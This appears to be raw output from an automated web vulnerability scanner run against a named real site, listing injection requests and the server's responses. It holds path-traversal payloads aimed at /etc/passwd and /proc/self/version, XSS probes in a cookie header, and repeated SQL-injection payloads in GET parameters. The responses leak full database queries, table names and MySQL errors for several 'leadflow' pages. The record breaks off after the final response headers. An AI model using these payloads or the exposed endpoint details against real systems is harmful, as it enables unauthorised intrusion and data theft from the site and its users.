OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:29:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=evflpkkihckjvokf3onkcekcl6; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/dima00/project.php

/ppc/leadflow/dima00/project.php

http://www.insideup.com/ppc/leadflow/dima00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/dima00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:30:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=88ulg04btkiuje7o0bi9imeqk7; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 50002
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:31:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2sbtagus4fhiuntou2ctogm7j1; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/cace00/project.php

/ppc/leadflow/cace00/project.php

http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 80007
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:32:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3bbbi1f23mkeoo56djlte5l3t0; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/incn00/project.php

/ppc/leadflow/incn00/project.php

http://www.insideup.com/ppc/leadflow/incn00/project.php?catId='%2B%20convert(int,(CHAR(95)%2BCHAR(33..

Parameters

Parameter Type Value
catId GET '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/incn00/project.php?catId='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:32:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qcttka2crouqvm8lqfcj6fn9o7; path=/
Content-Length: 3913
Connection: close
Content-Type: text/html; charset=UTF-8


